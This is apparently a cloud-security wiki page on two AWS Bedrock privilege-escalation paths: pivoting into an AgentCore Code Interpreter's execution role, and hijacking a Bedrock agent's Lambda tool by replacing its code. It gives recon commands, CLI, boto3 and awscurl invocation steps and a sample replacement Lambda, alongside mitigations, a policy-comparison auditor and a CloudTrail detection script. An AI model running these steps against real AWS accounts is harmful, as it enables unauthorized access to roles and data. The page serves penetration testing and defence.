AWS - Bedrock PrivEsc
Amazon Bedrock AgentCore
bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter is a managed execution environment. Custom Code Interpreters can be configured with an executionRoleArn that “provides permissions for the code interpreter to access AWS services”.
If a lower-privileged IAM principal can start + invoke a Code Interpreter session that is configured with a more privileged execution role, the caller can effectively pivot into that execution role's permissions (lateral movement / privilege escalation, depending on the role's scope).
Note
This is usually a misconfiguration / excessive permissions issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). AWS explicitly warns to avoid privilege escalation by ensuring execution roles have equal or fewer privileges than the identities allowed to invoke.
Preconditions (common misconfiguration)
- A custom code interpreter exists with an over-privileged execution role (e.g. access to sensitive S3/Secrets/SSM, or IAM-admin-like capabilities).
- A user (developer/auditor/CI identity) has permissions to:
  - start sessions: bedrock-agentcore:StartCodeInterpreterSession
  - invoke tools: bedrock-agentcore:InvokeCodeInterpreter
- (Optional) The user can also create interpreters: bedrock-agentcore:CreateCodeInterpreter (lets them create a new interpreter configured with an execution role, depending on the org's guardrails).
Recon (identify custom interpreters and execution role usage)
List interpreters (control-plane) and inspect their configuration:
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
The create-code-interpreter command supports --execution-role-arn, which defines which AWS permissions the interpreter will have.
Step 1 - Start a session (this returns a sessionId, not an interactive shell)
SESSION_ID=$(
  aws bedrock-agentcore start-code-interpreter-session \
    --code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
    --name "arte-oussama" \
    --query sessionId \
    --output text
)
echo "SessionId: $SESSION_ID"
Step 2 - Invoke code execution (Boto3 or signed HTTPS)
start-code-interpreter-session does not give you an interactive Python shell. Execution happens through InvokeCodeInterpreter.
Option A - Boto3 example (execute Python + verify identity):
import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
    codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
    sessionId="<SESSION_ID>",
    name="executeCode",
    arguments={
        "language": "python",
        "code": "import boto3; print(boto3.client('sts').get_caller_identity())"
    }
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
    print(event)
If the interpreter is configured with an execution role, the sts:GetCallerIdentity() output should show that role's identity (not the low-priv caller), demonstrating the pivot.
Option B - Signed HTTPS call (awscurl):
awscurl -X POST \
  "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json" \
  -H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
  --service bedrock-agentcore \
  --region <Region> \
  -d '{
    "name": "executeCode",
    "arguments": {
      "language": "python",
      "code": "print(\"Hello from AgentCore\")"
    }
  }'
Impact
- Lateral movement into whatever AWS access the interpreter execution role has.
- Privilege escalation if the interpreter execution role has more privileges than the caller.
- Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).
Mitigations / Hardening
- Least privilege on the interpreter executionRoleArn (treat it like Lambda execution roles / CI roles).
- Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) and who can start sessions.
- Use SCPs to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement may be necessary).
- Enable the appropriate CloudTrail data events for AgentCore where needed; alert on unexpected invocations and session creation.
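The rule AWS gives for this path (execution roles with equal or fewer privileges than the identities allowed to invoke) can be audited at the action level. The following is an added example, not code from the original page or from AWS: it compares only the Action patterns of Allow statements, handles only the `*` wildcard, and ignores Resource, Condition, Deny and NotAction. The policies EXEC_ROLE, DEV and AUDITOR are constructed samples.

```python
from fnmatch import fnmatchcase

# Both actions are needed to reach the execution role (see Preconditions).
PIVOT_ACTIONS = ("bedrock-agentcore:StartCodeInterpreterSession",
                 "bedrock-agentcore:InvokeCodeInterpreter")

def allowed_patterns(policy):
    """Action patterns from the Allow statements of one IAM policy document."""
    stmts = policy.get("Statement", [])
    stmts = [stmts] if isinstance(stmts, dict) else stmts
    out = []
    for s in stmts:
        if s.get("Effect") == "Allow":
            acts = s.get("Action", [])
            out += [acts] if isinstance(acts, str) else list(acts)
    return out

def covered(action, patterns):
    """True if `action` (itself possibly a '*' pattern) lies within some pattern.
    IAM action names are case-insensitive, so both sides are lower-cased."""
    return any(fnmatchcase(action.lower(), p.lower()) for p in patterns)

def excess_privileges(exec_policy, invoker_policy):
    """Execution-role actions the invoker does not already hold."""
    mine = allowed_patterns(invoker_policy)
    if not all(covered(a, mine) for a in PIVOT_ACTIONS):
        return []  # cannot start + invoke a session, so nothing to gain
    return sorted(a for a in allowed_patterns(exec_policy) if not covered(a, mine))

# Constructed sample policies (not taken from a real account).
EXEC_ROLE = {"Statement": [{"Effect": "Allow", "Resource": "*",
             "Action": ["s3:GetObject", "secretsmanager:GetSecretValue", "iam:*"]}]}
DEV = {"Statement": [
    {"Effect": "Allow", "Action": "bedrock-agentcore:*CodeInterpreter*", "Resource": "*"},
    {"Effect": "Allow", "Action": ["s3:Get*", "iam:List*"], "Resource": "*"}]}
AUDITOR = {"Statement": {"Effect": "Allow", "Action": ["s3:*", "iam:*"], "Resource": "*"}}

if __name__ == "__main__":
    print("DEV gains:", excess_privileges(EXEC_ROLE, DEV))
    print("AUDITOR gains:", excess_privileges(EXEC_ROLE, AUDITOR))
```

A non-empty result means the execution role is broader than an identity that can invoke it, which is the condition the mitigations above are meant to remove.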
Amazon Bedrock Agents
lambda:UpdateFunctionCode, bedrock:InvokeAgent - Agent Tool Hijacking via Lambda
Bedrock Agents can use Lambda-backed action groups as tools (external execution). If a principal can modify the code of a Lambda function used by an agent, and can then invoke the agent, they can execute attacker-controlled code under the Lambda execution role.
Note
This is cross-service trust abuse (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it through the agent.
Preconditions (common misconfiguration)
- A Bedrock Agent exists with an action group backed by a Lambda function
- The attacker has:
  - lambda:UpdateFunctionCode
  - bedrock:InvokeAgent
- The Lambda execution role has broader permissions than the attacker
- The attacker can identify the Lambda used by the agent
Recon
Enumerate agent action groups:
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
Inspect the Lambda:
aws lambda get-function --function-name <FUNCTION_NAME>
Execution
Replace the Lambda code:
zip payload.zip lambda_function.py
aws lambda update-function-code \
  --function-name <FUNCTION_NAME> \
  --zip-file fileb://payload.zip
Example payload:
import boto3

def lambda_handler(event, context):
    return boto3.client("sts").get_caller_identity()
Trigger it through the agent:
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
Impact
- Privilege escalation to the Lambda execution role
- Data exfiltration from AWS services
- Cross-service abuse through trusted agent execution
Mitigations
- Restrict lambda:UpdateFunctionCode
- Use least-privilege Lambda roles
- Monitor Lambda code changes
- Audit Bedrock agent tool usage
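One way to implement the last two mitigations is to correlate Lambda code changes with agent invocations in CloudTrail. This is an added example, not code from the original page: the inventory of tool Lambdas and deploy roles, the account id, and the trimmed sample records are constructed, and it assumes InvokeAgent data events are being logged.

```python
from datetime import datetime, timedelta

ACCT = "111122223333"  # placeholder account id
# Assumed inventory: Lambdas behind agent action groups, and who may deploy them.
TOOL_LAMBDAS = {f"arn:aws:lambda:us-east-1:{ACCT}:function:order-tool"}
DEPLOY = f"arn:aws:sts::{ACCT}:assumed-role/ci-deploy/pipeline"
DEPLOYERS = {DEPLOY}
WINDOW = timedelta(hours=1)

def when(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def detect_tool_hijack(events):
    """Alert on code changes to agent tool Lambdas by non-deployers; raise
    severity when the same principal invokes an agent within WINDOW."""
    alerts, pending = [], {}  # pending: principal -> (update time, alert)
    for ev in sorted(events, key=when):
        who, src, name = ev["userIdentity"]["arn"], ev["eventSource"], ev["eventName"]
        if src == "lambda.amazonaws.com" and name.startswith("UpdateFunctionCode"):
            arn = (ev.get("responseElements") or {}).get("functionArn", "")
            base = ":".join(arn.split(":")[:7])  # drop a :version/:alias qualifier
            if base in TOOL_LAMBDAS and who not in DEPLOYERS:
                alert = {"principal": who, "function": base, "severity": "medium"}
                alerts.append(alert)
                pending[who] = (when(ev), alert)
        elif src == "bedrock.amazonaws.com" and name == "InvokeAgent" and who in pending:
            updated, alert = pending[who]
            if when(ev) - updated <= WINDOW:
                alert["severity"] = "high"
    return alerts

def sample(time, who, src, name, fn=None):
    """Build a constructed, trimmed CloudTrail-style record."""
    ev = {"eventTime": f"2025-01-15T{time}:00Z", "eventSource": src,
          "eventName": name, "userIdentity": {"arn": who}}
    if fn:
        ev["responseElements"] = {"functionArn": f"arn:aws:lambda:us-east-1:{ACCT}:function:{fn}"}
    return ev

L, B, UPD = "lambda.amazonaws.com", "bedrock.amazonaws.com", "UpdateFunctionCode20150331v2"
DEV_A, DEV_C = f"arn:aws:iam::{ACCT}:user/dev-a", f"arn:aws:iam::{ACCT}:user/dev-c"
SAMPLE_EVENTS = [  # constructed for this example
    sample("10:00", DEPLOY, L, UPD, "order-tool"),    # approved pipeline: ignored
    sample("11:00", DEV_A, L, UPD, "order-tool:3"),   # non-deployer changes a tool
    sample("11:10", DEV_A, B, "InvokeAgent"),         # then drives the agent: high
    sample("12:00", DEV_A, L, UPD, "report-gen"),     # not an agent tool: ignored
    sample("13:00", DEV_C, L, UPD, "order-tool"),     # change only: medium
    sample("15:30", DEV_C, B, "InvokeAgent"),         # outside WINDOW: stays medium
]
```

Running `detect_tool_hijack(SAMPLE_EVENTS)` returns one high-severity alert for dev-a and one medium-severity alert for dev-c.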
References
- Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)
- Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)
- AWS CLI: create-code-interpreter (--execution-role-arn)
- AWS CLI: start-code-interpreter-session (returns sessionId)
- AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)
- AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)
- SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)

